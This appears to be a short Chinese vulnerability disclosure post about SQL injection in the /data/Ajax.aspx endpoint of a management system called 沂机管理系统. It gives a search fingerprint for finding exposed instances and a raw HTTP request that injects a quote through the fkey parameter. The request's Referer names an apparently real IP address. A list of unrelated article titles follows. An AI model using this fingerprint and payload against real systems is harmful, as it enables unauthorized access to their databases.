沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞

body="后台管理系统演示版"

GET /data/Ajax.aspx?method=log_list&page=1&limit=20&fkey=1'&fdate1=2024-10-01+00%3A00%3A00&fdate2=2024-10-01+23%3A59%3A59 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/log_list.aspx?ModuleID=104&navtabid=a102&reporttitle=60xZrkSLVc4i9GTkoGayYA==&fwidth=600&fheight=355
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

相关文章：

C++ | Leetcode C++题解之第452题用最少数量的箭引爆气球

Linux基于CentOS学习【进程状态】【进程优先级】【调度与切换】【进程挂起】【进程饥饿】

C语言自定义类型联合和枚举(25)

虾皮Shopee Android面试题及参考答案

新手教学系列——MacOS 10.13.6下如何使用curl_cffi模拟Chrome请求

【AIGC】ChatGPT提示词Prompt解析：如何打造个人IP、CSDN爆款技术文案与高效教案设计

mysql学习教程，从入门到精通，SQL LIKE 运算符（28）

深入理解Dubbo源码核心原理-Part4

7.Javaweb-Ajax

计算机毕业设计 网上体育商城系统的设计与实现 Java实战项目 附源码+文档+视频讲解

计算机毕业设计 基于爬虫与文本挖掘的网络舆情监控系统的设计与实现 Python+Django+Vue 前后端分离 附源码 讲解 文档

开发维护一个项目需要考虑的地方

网络基础知识笔记(四)

[Linux#61][UDP] port | netstat | udp缓冲区 | stm32

mysql学习教程，从入门到精通，SQL HAVING 子句（32）

SpringBoot与舞蹈艺术：古典舞在线交流平台开发记

【在Linux世界中追寻伟大的One Piece】进程信号

Libtorch学习之Libtorch-VS2019-图像分割程序

探索后量子安全：基于格加密技术的未来密码学展望

影视cms泛目录用什么程序？苹果cms二次开发泛目录插件